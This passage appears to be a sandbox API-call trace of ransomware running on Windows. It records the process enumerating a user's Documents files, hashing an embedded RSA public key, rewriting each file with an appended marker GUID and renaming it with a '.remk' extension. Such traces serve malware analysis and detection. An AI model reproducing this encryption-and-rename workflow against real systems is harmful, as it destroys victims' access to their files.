KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.727] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.728] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.728] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.728] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.728] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.728] GetLastError () returned 0x0 [0233.728] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.728] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.728] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.728] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.728] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.728] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.729] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.729] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.729] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x4689, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.729] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.730] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.730] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.730] CloseHandle (hObject=0x640) returned 1 [0233.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.731] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x325d3b8 [0233.731] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\p2Sojk8t7gJih823M5.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\p2sojk8t7gjih823m5.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\p2Sojk8t7gJih823M5.pptx.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\p2sojk8t7gjih823m5.pptx.remk")) returned 1 [0233.733] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x488a5e80, ftCreationTime.dwHighDateTime=0x1d5dad3, ftLastAccessTime.dwLowDateTime=0x32b8f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x32b8f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3pat", cAlternateFileName="")) returned 1 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x31a4298 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694310 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37baab0 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e600 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694e38 [0233.733] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e730 [0233.733] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6470fc10, ftCreationTime.dwHighDateTime=0x1d5d968, ftLastAccessTime.dwLowDateTime=0x2a2660d0, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x2a2660d0, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0xc377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UUwhrC FoVL4PsJ.ppt", cAlternateFileName="UUWHRC~1.PPT")) returned 1 [0233.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0233.734] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.734] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\UUwhrC FoVL4PsJ.ppt") returned=".ppt" [0233.734] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\UUwhrC FoVL4PsJ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\uuwhrc fovl4psj.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.734] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=50039) returned 1 [0233.734] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.737] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc351, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.737] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.739] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.739] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xc377, lpOverlapped=0x0) returned 1 [0233.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.740] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.740] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.740] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0233.741] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.741] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.741] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.741] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.742] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.742] GetLastError () returned 0x0 [0233.742] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.742] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0233.742] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.742] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.742] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.742] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.742] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.743] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc377, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.743] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.743] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.743] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.743] CloseHandle (hObject=0x640) returned 1 [0233.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0233.745] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b8 [0233.745] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\UUwhrC FoVL4PsJ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\uuwhrc fovl4psj.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\UUwhrC FoVL4PsJ.ppt.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x0h6nwrparx5m\\uuwhrc fovl4psj.ppt.remk")) returned 1 [0233.747] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6470fc10, ftCreationTime.dwHighDateTime=0x1d5d968, ftLastAccessTime.dwLowDateTime=0x2a2660d0, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x2a2660d0, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0xc377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UUwhrC FoVL4PsJ.ppt", cAlternateFileName="UUWHRC~1.PPT")) returned 0 [0233.747] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba600 | out: hHeap=0x630000) returned 1 [0233.747] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0233.747] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.747] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.747] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.748] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.748] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.749] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.749] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.750] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.750] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0233.751] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.751] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.751] 